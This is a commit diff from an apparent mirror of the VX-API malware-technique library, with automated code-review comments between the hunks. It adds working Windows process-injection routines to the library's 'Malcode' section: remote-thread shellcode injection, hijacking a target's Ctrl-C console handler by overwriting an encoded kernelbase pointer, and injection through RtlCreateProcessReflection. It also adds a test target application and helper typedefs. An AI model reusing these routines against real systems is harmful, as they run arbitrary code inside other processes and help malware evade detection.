mirror of https://github.com/vxunderground/VX-API
parent
1e198d4dd8
commit
bd5aba026d
|
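--- /dev/null
+++ b/Process Injection Testing Applications/Main.cpp
@@ -0,0 +1,61 @@
+#include <Windows.h>
+#include <stdio.h>
+
+BOOL PrintBanner(VOID)
+{
+
+puts("");
+puts(" vx-underground.org Process Injection Testing Application (PITA)");
+puts("");
+puts("\t8b d8 8b d8 88 88 ,ad8888ba, ");
+puts("\t`8b d8' Y8, ,8P 88 88 d8\"' `\"8b ");
+puts("\t `8b d8' `8b d8' 88 88 d8' ");
+puts("\t `8b d8' Y88P 88 88 88 ");
+puts("\t `8b d8' d88b 88 88 88 88888 ");
+puts("\t `8b d8' ,8P Y8, 88 88 Y8, 88 ");
+puts("\t `888' d8' `8b Y8a. . a8P Y8a. a88 ");
+puts("\t `8' 8P Y8 `\"Y8888Y\"' `\"Y88888P\"");
+puts("");
+
+puts(" Built for process injection testing && based on the research conducted by SafeBreach Labs");
+puts("");
+puts("");
+
+return TRUE;
+}
+
+DWORD WndProcCallbackRoutine(_In_ LPVOID lpParameter)
+{
+MSG Msg;
+BOOL bRet;
+
+printf("Message loop Thread ID = %ld\r\n", GetCurrentThreadId());
+while ((bRet = GetMessage(&Msg, NULL, 0, 0)) != 0)
+{
+if (bRet == -1)
+return GetLastError();
+
+TranslateMessage(&Msg);
+DispatchMessageW(&Msg);
+}
+
+return (DWORD)Msg.wParam;
+}
+
+INT main(VOID)
+{
+HANDLE hThread = NULL;
+PrintBanner();
+
+hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)WndProcCallbackRoutine, NULL, 0, NULL);
+if (hThread == NULL)
+return GetLastError();
+
+while (TRUE)
+{
+printf("Process ID = %ld, Thread ID = %ld -- Application is in an alertable state\r\n", GetCurrentProcessId(), GetCurrentThreadId());
+SleepEx(10000, TRUE);
+}
+
+return ERROR_SUCCESS;
+}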
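Review bot: `WndProcCallbackRoutine` is declared without `WINAPI`, and the `(LPTHREAD_START_ROUTINE)` cast on the `CreateThread` call in `main` hides that; the project file added in the same commit builds Win32 configurations, where the callee convention differs and the cast suppresses the error the compiler would otherwise raise. Declare it `DWORD WINAPI WndProcCallbackRoutine(_In_ LPVOID lpParameter)` and pass it uncast. Both `printf` calls format `DWORD` values with `%ld`; `%lu` matches the unsigned type. A one-line header comment stating that this binary is a deliberately alertable, message-pumping target for the repository's injection tests would explain to a reader why `main` loops forever on `SleepEx(10000, TRUE)` and never closes `hThread`.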
@ -0,0 +1,135 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup Label="ProjectConfigurations">
|
||||
<ProjectConfiguration Include="Debug|Win32">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|Win32">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>Win32</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Debug|x64">
|
||||
<Configuration>Debug</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
<ProjectConfiguration Include="Release|x64">
|
||||
<Configuration>Release</Configuration>
|
||||
<Platform>x64</Platform>
|
||||
</ProjectConfiguration>
|
||||
</ItemGroup>
|
||||
<PropertyGroup Label="Globals">
|
||||
<VCProjectVersion>16.0</VCProjectVersion>
|
||||
<Keyword>Win32Proj</Keyword>
|
||||
<ProjectGuid>{fbf1308a-94f4-4bec-b2b3-d30a19bddb4a}</ProjectGuid>
|
||||
<RootNamespace>ProcessInjectionTestingApplications</RootNamespace>
|
||||
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v143</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v143</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>true</UseDebugLibraries>
|
||||
<PlatformToolset>v143</PlatformToolset>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||
<ConfigurationType>Application</ConfigurationType>
|
||||
<UseDebugLibraries>false</UseDebugLibraries>
|
||||
<PlatformToolset>v143</PlatformToolset>
|
||||
<WholeProgramOptimization>true</WholeProgramOptimization>
|
||||
<CharacterSet>Unicode</CharacterSet>
|
||||
</PropertyGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||
<ImportGroup Label="ExtensionSettings">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="Shared">
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||
</ImportGroup>
|
||||
<PropertyGroup Label="UserMacros" />
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
|
||||
<ClCompile>
|
||||
<WarningLevel>Level3</WarningLevel>
|
||||
<FunctionLevelLinking>true</FunctionLevelLinking>
|
||||
<IntrinsicFunctions>true</IntrinsicFunctions>
|
||||
<SDLCheck>true</SDLCheck>
|
||||
<PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
|
||||
<ConformanceMode>true</ConformanceMode>
|
||||
</ClCompile>
|
||||
<Link>
|
||||
<SubSystem>Console</SubSystem>
|
||||
<EnableCOMDATFolding>true</EnableCOMDATFolding>
|
||||
<OptimizeReferences>true</OptimizeReferences>
|
||||
<GenerateDebugInformation>true</GenerateDebugInformation>
|
||||
</Link>
|
||||
</ItemDefinitionGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="Main.cpp" />
|
||||
</ItemGroup>
|
||||
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
|
||||
<ImportGroup Label="ExtensionTargets">
|
||||
</ImportGroup>
|
||||
</Project>
|
|
@ -0,0 +1,22 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<ItemGroup>
|
||||
<Filter Include="Source Files">
|
||||
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
|
||||
<Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Header Files">
|
||||
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
|
||||
<Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
|
||||
</Filter>
|
||||
<Filter Include="Resource Files">
|
||||
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
|
||||
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
|
||||
</Filter>
|
||||
</ItemGroup>
|
||||
<ItemGroup>
|
||||
<ClCompile Include="Main.cpp">
|
||||
<Filter>Source Files</Filter>
|
||||
</ClCompile>
|
||||
</ItemGroup>
|
||||
</Project>
|
|
@ -0,0 +1,4 @@
|
|||
<?xml version="1.0" encoding="utf-8"?>
|
||||
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||
<PropertyGroup />
|
||||
</Project>
|
12
README.md
12
README.md
|
@ -3,7 +3,7 @@ managed by [vx-underground](https://vx-underground.org) | follow us on [Twitter]
|
|||
|
||||
# VX-API
|
||||
|
||||
Version: 2.0.488
|
||||
Version: 2.0.505
|
||||
|
||||
Developer: smelly__vx
|
||||
|
||||
|
@ -42,6 +42,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| StringToken | Apple (c) 1999 | String Manipulation |
|
||||
| ZeroMemoryEx | ReactOS | String Manipulation |
|
||||
| ConvertCharacterStringToIntegerUsingNtdll | smelly__vx | String Manipulation |
|
||||
| MemoryFindMemory | KamilCuk | String Manipulation |
|
||||
| AdfCloseHandleOnInvalidAddress | Checkpoint Research | Anti-debug |
|
||||
| AdfIsCreateProcessDebugEventCodeSet | Checkpoint Research | Anti-debug |
|
||||
| AdfOpenProcessOnCsrss | Checkpoint Research | Anti-debug |
|
||||
|
@ -156,6 +157,7 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| MpfGetLsaPidFromRegistry | modexp | Malcode |
|
||||
| MpfGetLsaPidFromNamedPipe | modexp | Malcode |
|
||||
| ShellcodeExecutionViaFunctionCallbackMain | alfarom256, aahmad097| Malcode |
|
||||
| ProcessInjectionMain | SafeBreach Labs | Malcode |
|
||||
| MpfComMonitorChromeSessionOnce | smelly__vx | Malcode |
|
||||
| MpfExecute64bitPeBinaryInMemoryFromByteArrayNoReloc | aaaddress1 | Malcode |
|
||||
| MpfLolExecuteRemoteBinaryByAppInstaller | Wade Hickey | Malcode |
|
||||
|
@ -185,11 +187,3 @@ You're free to use this in any manner you please. You do not need to use this en
|
|||
| IcmpSendEcho2Ex | N/A | N/A |
|
||||
| WQL Win32_Ping | Martin Friedrich | N/A |
|
||||
| Process Injection | N/A | N/A |
|
||||
|
||||
# Notes
|
||||
| Function Name | Note | Fixed |
|
||||
| ------------- | ---- | ----- |
|
||||
| StringToken | Needs revision, buggy | N/A |
|
||||
| NtQueryOpenSubKeysEx | admin required | N/A |
|
||||
| ManualResourceDataFetching by Orca | Review and complete | N/A |
|
||||
| MpfComMonitorChromeSessionOnce | Usability improvements needed | N/A |
|
||||
|
|
10
VX-API.sln
10
VX-API.sln
|
@ -5,6 +5,8 @@ VisualStudioVersion = 17.3.32811.315
|
|||
MinimumVisualStudioVersion = 10.0.40219.1
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "VX-API", "VX-API\VX-API.vcxproj", "{12CF8029-1663-470E-B138-39DC69C35B1D}"
|
||||
EndProject
|
||||
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Process Injection Testing Applications", "Process Injection Testing Applications\Process Injection Testing Applications.vcxproj", "{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}"
|
||||
EndProject
|
||||
Global
|
||||
GlobalSection(SolutionConfigurationPlatforms) = preSolution
|
||||
Debug|x64 = Debug|x64
|
||||
|
@ -21,6 +23,14 @@ Global
|
|||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x64.Build.0 = Release|x64
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x86.ActiveCfg = Release|Win32
|
||||
{12CF8029-1663-470E-B138-39DC69C35B1D}.Release|x86.Build.0 = Release|Win32
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Debug|x64.ActiveCfg = Debug|x64
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Debug|x64.Build.0 = Debug|x64
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Debug|x86.ActiveCfg = Debug|Win32
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Debug|x86.Build.0 = Debug|Win32
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Release|x64.ActiveCfg = Release|x64
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Release|x64.Build.0 = Release|x64
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Release|x86.ActiveCfg = Release|Win32
|
||||
{FBF1308A-94F4-4BEC-B2B3-D30A19BDDB4A}.Release|x86.Build.0 = Release|Win32
|
||||
EndGlobalSection
|
||||
GlobalSection(SolutionProperties) = preSolution
|
||||
HideSolutionNode = FALSE
|
||||
|
|
|
@ -37,6 +37,8 @@ typedef NTSTATUS(NTAPI* LDRREGISTERDLLNOTIFICATION)(ULONG, LDR_DLL_NOTIFICATION_
|
|||
typedef NTSTATUS(NTAPI* LDRUNREGISTERDLLNOTIFICATION)(PVOID);
|
||||
typedef NTSTATUS(NTAPI* RTLCHARTOINTEGER)(PCHAR, ULONG, PULONG);
|
||||
typedef ULONG(NTAPI* RTLUNIFORM)(PULONG);
|
||||
typedef NTSTATUS(NTAPI* RTLCREATEPROCESSREFLECTION)(HANDLE, ULONG, PVOID, PVOID, HANDLE, RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION*);
|
||||
typedef NTSTATUS(NTAPI* RTLENCODEREMOTEPOINTER)(HANDLE, PVOID, PVOID*);
|
||||
|
||||
|
||||
|
||||
|
|
|
@ -61,6 +61,10 @@
|
|||
#define FILE_PIPE_READ_DATA 0x00000000
|
||||
#define FILE_PIPE_WRITE_SPACE 0x00000001
|
||||
|
||||
#define RTL_CLONE_PROCESS_FLAGS_CREATE_SUSPENDED 0x00000001
|
||||
#define RTL_CLONE_PROCESS_FLAGS_INHERIT_HANDLES 0x00000002
|
||||
#define RTL_CLONE_PROCESS_FLAGS_NO_SYNCHRONIZE 0x00000004
|
||||
|
||||
typedef struct _LSA_UNICODE_STRING {
|
||||
USHORT Length;
|
||||
USHORT MaximumLength;
|
||||
|
@ -1155,3 +1159,10 @@ typedef union _LDR_DLL_NOTIFICATION_DATA {
|
|||
|
||||
typedef VOID(CALLBACK* LDR_DLL_NOTIFICATION_FUNCTION)(ULONG, CONST PLDR_DLL_NOTIFICATION_DATA, PVOID);
|
||||
|
||||
typedef struct RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION
|
||||
{
|
||||
HANDLE ReflectionProcessHandle;
|
||||
HANDLE ReflectionThreadHandle;
|
||||
CLIENT_ID ReflectionClientId;
|
||||
} RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION, *PRTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION;
|
||||
|
||||
|
|
|
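Review bot: The `RTLCREATEPROCESSREFLECTION` typedef added near line 40 names `RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION*` before the struct is declared around line 1162 of the same header; in C++ a bare type name in a parameter list needs a prior declaration, so unless an earlier include provides one this should not compile — the pre-existing `LDR_DLL_NOTIFICATION_` typedef on the context line appears to rely on the same arrangement, so presumably it resolves somehow, but that is worth confirming rather than assuming. A forward declaration `struct RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION;` ahead of the typedef, or moving the struct up next to the `RTL_CLONE_PROCESS_FLAGS_*` defines, removes the question. The three new flag defines carry no comment naming the parameter they belong to; `// Flags argument of RtlCreateProcessReflection` on the first one would do.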
@ -35,8 +35,16 @@ int main(VOID)
|
|||
Sei.dwLengthOfPayloadInBytes = 277;
|
||||
Sei.MethodEnum = E_RTLUSERFIBERSTART;
|
||||
DWORD dwX = 0;
|
||||
|
||||
PROCESS_INJECTION_INFORMATION Pii = { 0 };
|
||||
|
||||
Pii.Payload = GlobalOpenCalcPayload;
|
||||
Pii.dwLengthOfPayloadInBytes = 277;
|
||||
Pii.ProcessId = 31480;
|
||||
Pii.MethodEnum = E_CTRL_INJECT;
|
||||
|
||||
//ShellcodeExecutionViaFunctionCallbackMain(&Sei);
|
||||
//ProcessInjectionMain(&Pii);
|
||||
|
||||
return dwError;
|
||||
}
|
||||
|
|
|
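Review bot: `Pii.ProcessId = 31480;` is a PID left over from a local debugging session and means nothing on any other machine, and `DWORD dwX = 0;` on the context line above does not appear to be used anywhere in the hunk; both calls that would consume `Sei` and `Pii` are commented out. Since this `main` is the repository's smoke-test entry point, leave the PID at `0` with a comment such as `// set to the test target's PID before enabling the call below`, or take it from argv, so the committed default cannot silently name an arbitrary process. `main` begins before this hunk.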
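--- /dev/null
+++ b/VX-API/MemoryFindMemory.cpp
@@ -0,0 +1,15 @@
+#include "StringManipulation.h"
+
+PVOID MemoryFindMemory(_In_ PVOID Haystack, _In_ SIZE_T HaystackLength, _In_ PVOID Needle, _In_ SIZE_T NeedleLength)
+{
+if (!Haystack || !HaystackLength || !Needle || !NeedleLength)
+return NULL;
+
+for (PCHAR pChar = (PCHAR)Haystack; HaystackLength >= NeedleLength; ++pChar, --HaystackLength)
+{
+if (!memcmp(pChar, Needle, NeedleLength))
+return pChar;
+}
+
+return NULL;
+}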
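Review bot: The new function has no header comment, and its `PVOID`/`SIZE_T` parameters carry only `_In_`, so nothing states that `memcmp` reads `NeedleLength` bytes at every candidate offset and that `HaystackLength` must therefore be the readable size of the region. Annotate the buffers as `_In_reads_bytes_(HaystackLength) PVOID Haystack` and `_In_reads_bytes_(NeedleLength) PVOID Needle`, here and on the prototype added to StringManipulation.h, and add a comment such as `// Returns a pointer to the first occurrence of Needle inside Haystack, or NULL; the loop condition keeps every memcmp within HaystackLength.` The callers in ProcessInjectionMain.cpp pass a module base together with its `SizeOfImage`, so that bound is doing real work.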
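--- /dev/null
+++ b/VX-API/MpfProcessInjectionViaProcessReflection.cpp
@@ -0,0 +1,59 @@
+#include "Win32Helper.h"
+
+BOOL MpfProcessInjectionViaProcessReflection(_In_ PBYTE Shellcode, _In_ DWORD dwSizeOfShellcodeInBytes, _In_ DWORD TargetPid)
+{
+/*
+This process execution is really finnicky. I was able to get this to work
+using the proof-of-concept dubbed "DirtyVanity".
+
+Link: https://github.com/deepinstinct/Dirty-Vanity
+
+However, I was unable to get this to work using traditional shellcode (or PIC binaries)
+from projects such as Donut of MsfVenom. I am too lazy to modify the Shellcode supplied
+from DeepInstinct.
+
+tl;dr code works, too lazy to debug to determine more accurate shellcode requirements
+
+/me shrugs
+
+*/
+
+RTLCREATEPROCESSREFLECTION RtlCreateProcessReflection = NULL;
+HMODULE hModule = NULL;
+BOOL bFlag = FALSE;
+HANDLE hHandle = NULL;
+LPVOID BaseAddress = NULL;
+SIZE_T DisposableObject = ERROR_SUCCESS;
+RTLP_PROCESS_REFLECTION_REFLECTION_INFORMATION Information = { 0 };
+
+hModule = GetModuleHandleEx2W(L"ntdll.dll");
+if (hModule == NULL)
+goto EXIT_ROUTINE;
+
+RtlCreateProcessReflection = (RTLCREATEPROCESSREFLECTION)GetProcAddressA((DWORD64)hModule, "RtlCreateProcessReflection");
+if (!RtlCreateProcessReflection)
+goto EXIT_ROUTINE;
+
+hHandle = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_CREATE_THREAD | PROCESS_DUP_HANDLE, TRUE, TargetPid);
+if (hHandle == NULL)
+goto EXIT_ROUTINE;
+
+BaseAddress = VirtualAllocEx(hHandle, NULL, dwSizeOfShellcodeInBytes, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
+if (BaseAddress == NULL)
+goto EXIT_ROUTINE;
+
+if (!WriteProcessMemory(hHandle, BaseAddress, Shellcode, dwSizeOfShellcodeInBytes, &DisposableObject))
+goto EXIT_ROUTINE;
+
+if (RtlCreateProcessReflection(hHandle, RTL_CLONE_PROCESS_FLAGS_INHERIT_HANDLES | RTL_CLONE_PROCESS_FLAGS_NO_SYNCHRONIZE, BaseAddress, NULL, NULL, &Information) != STATUS_SUCCESS)
+goto EXIT_ROUTINE;
+
+bFlag = TRUE;
+
+EXIT_ROUTINE:
+
+if (hHandle)
+CloseHandle(hHandle);
+
+return bFlag;
+}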
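Review bot: The handles that `RtlCreateProcessReflection` returns in `Information` (`ReflectionProcessHandle` and `ReflectionThreadHandle`, per the struct added to Internal.h) are never closed — `EXIT_ROUTINE` only closes `hHandle` — so every successful call leaks two handles; add `if (Information.ReflectionThreadHandle) CloseHandle(Information.ReflectionThreadHandle);` and the same for the process handle before the return. The remote allocation from `VirtualAllocEx` is likewise not released on the failure paths that follow it, unlike the cleanup block in ProcessInjectionMain.cpp. `OpenProcess` is called with `bInheritHandle = TRUE` while every other call in this commit passes `FALSE`; if inheritance is deliberate a comment should say why, otherwise make it consistent. The block comment is a working diary; a short statement of the observed precondition — the routine was only seen to work with the DirtyVanity proof-of-concept payload, not with ordinary position-independent shellcode — documents the same caveat in a form a maintainer can act on.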
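--- /dev/null
+++ b/VX-API/ProcessInjectionMain.cpp
@@ -0,0 +1,168 @@
+#include "Win32Helper.h"
+
+
+// ---------------------------------------- EXIT ROUTINE ----------------------------------------
+//EXIT_ROUTINE_CASE_0:
+DWORD ProcessInjectionMain(_In_ PPROCESS_INJECTION_INFORMATION Pii)
+{
+DWORD dwReturn = ERROR_SUCCESS;
+HANDLE hHandle = NULL;
+LPVOID BaseAddress = NULL;
+HANDLE hThread = NULL;
+BOOL bFlag = FALSE;
+
+switch (Pii->MethodEnum)
+{
+case E_WRITEPROCESSMEMORY_CREATEREMOTETHREAD_EXECUTESHELLCODE:
+{
+hHandle = OpenProcess(PROCESS_ALL_ACCESS, FALSE, Pii->ProcessId);
+if (hHandle == NULL)
+break;
+
+BaseAddress = VirtualAllocEx(hHandle, NULL, Pii->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+if (BaseAddress == NULL)
+break;
+
+if (!SetProcessPrivilegeToken(0))
+break;
+
+if (!WriteProcessMemory(hHandle, BaseAddress, Pii->Payload, Pii->dwLengthOfPayloadInBytes, NULL))
+break;
+
+hThread = CreateRemoteThread(hHandle, NULL, 0, (LPTHREAD_START_ROUTINE)BaseAddress, NULL, 0, NULL);
+if (hThread == NULL)
+break;
+
+WaitForSingleObject(hThread, INFINITE);
+
+bFlag = TRUE;
+
+break;
+}
+
+case E_CTRL_INJECT:
+{
+DWORD ConsoleAttachList[2] = { 0 };
+DWORD ParentId = 0;
+PVOID EncodedAddress = NULL;
+INPUT Input = { 0 };
+MODULEINFO KernelbaseInformation = { 0 };
+HWND hWindow = NULL;
+HMODULE KernelBase = NULL, hModule = NULL;
+RTLENCODEREMOTEPOINTER RtlEncodeRemotePointer = NULL;
+DWORD64 Encoded = 0;
+
+PCHAR KernelBaseDefaultHandler = NULL;
+PCHAR KernelBaseSingleHandler = NULL;
+
+KernelBase = GetModuleHandleEx2W(L"kernelbase.dll");
+hModule = GetModuleHandleEx2W(L"ntdll.dll");
+
+if (!KernelBase || !hModule)
+break;
+
+RtlEncodeRemotePointer = (RTLENCODEREMOTEPOINTER)GetProcAddressA((DWORD64)hModule, "RtlEncodeRemotePointer");
+if (RtlEncodeRemotePointer == NULL)
+break;
+
+if (!K32GetModuleInformation(InlineGetCurrentProcess, KernelBase, &KernelbaseInformation, sizeof(KernelbaseInformation)))
+break;
+
+KernelBaseDefaultHandler = (PCHAR)MemoryFindMemory(KernelBase, KernelbaseInformation.SizeOfImage, (PVOID)"\x48\x83\xec\x28\xb9\x3a\x01\x00\xc0", 9);
+if (KernelBaseDefaultHandler == NULL)
+break;
+
+Encoded = (DWORD64)EncodePointer(KernelBaseDefaultHandler);
+if (Encoded == 0)
+break;
+
+KernelBaseSingleHandler = (PCHAR)MemoryFindMemory(KernelBase, KernelbaseInformation.SizeOfImage, &Encoded, 8);
+if (KernelBaseSingleHandler == NULL)
+break;
+
+if (GetConsoleProcessList(ConsoleAttachList, 2) < 2)
+break;
+
+if (ConsoleAttachList[0] != GetCurrentProcessIdFromTeb())
+ParentId = ConsoleAttachList[0];
+else
+ParentId = ConsoleAttachList[1];
+
+FreeConsole();
+AttachConsole(Pii->ProcessId);
+
+hWindow = GetConsoleWindow();
+
+FreeConsole();
+AttachConsole(ParentId);
+
+hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, Pii->ProcessId);
+
+BaseAddress = VirtualAllocEx(hHandle, NULL, Pii->dwLengthOfPayloadInBytes, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+if (BaseAddress == NULL)
+break;
+
+if (!WriteProcessMemory(hHandle, BaseAddress, Pii->Payload, Pii->dwLengthOfPayloadInBytes, NULL))
+break;
+
+CloseHandle(hHandle);
+
+hHandle = OpenProcess(PROCESS_VM_WRITE | PROCESS_VM_OPERATION, FALSE, Pii->ProcessId); // PROCESS_VM_OPERATION is required for RtlEncodeRemotePointer
+if (hHandle == NULL)
+break;
+
+RtlEncodeRemotePointer(hHandle, BaseAddress, &EncodedAddress);
+
+if (!WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL))
+break;
+
+Input.type = INPUT_KEYBOARD;
+Input.ki.wScan = 0;
+Input.ki.time = 0;
+Input.ki.dwExtraInfo = 0;
+Input.ki.wVk = VK_CONTROL;
+Input.ki.dwFlags = 0; // 0 for key press
+
+SendInput(1, &Input, sizeof(INPUT));
+Sleep(100);
+
+PostMessageA(hWindow, WM_KEYDOWN, 'C', 0);
+
+Sleep(100);
+
+Input.type = INPUT_KEYBOARD;
+Input.ki.wScan = 0;
+Input.ki.time = 0;
+Input.ki.dwExtraInfo = 0;
+Input.ki.wVk = VK_CONTROL;
+Input.ki.dwFlags = KEYEVENTF_KEYUP;
+SendInput(1, &Input, sizeof(INPUT));
+
+RtlEncodeRemotePointer(hHandle, KernelBaseDefaultHandler, &EncodedAddress);
+WriteProcessMemory(hHandle, KernelBaseSingleHandler, &EncodedAddress, 8, NULL);
+
+bFlag = TRUE;
+break;
+}
+
+default:
+break;
+}
+
+if (!bFlag)
+dwReturn = GetLastErrorFromTeb();
+
+if (BaseAddress)
+{
+if(hHandle)
+VirtualFreeEx(hHandle, BaseAddress, ERROR_SUCCESS, MEM_RELEASE);
+}
+
+if (hThread)
+CloseHandle(hThread);
+
+if (hHandle)
+CloseHandle(hHandle);
+
+return dwReturn;
+}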
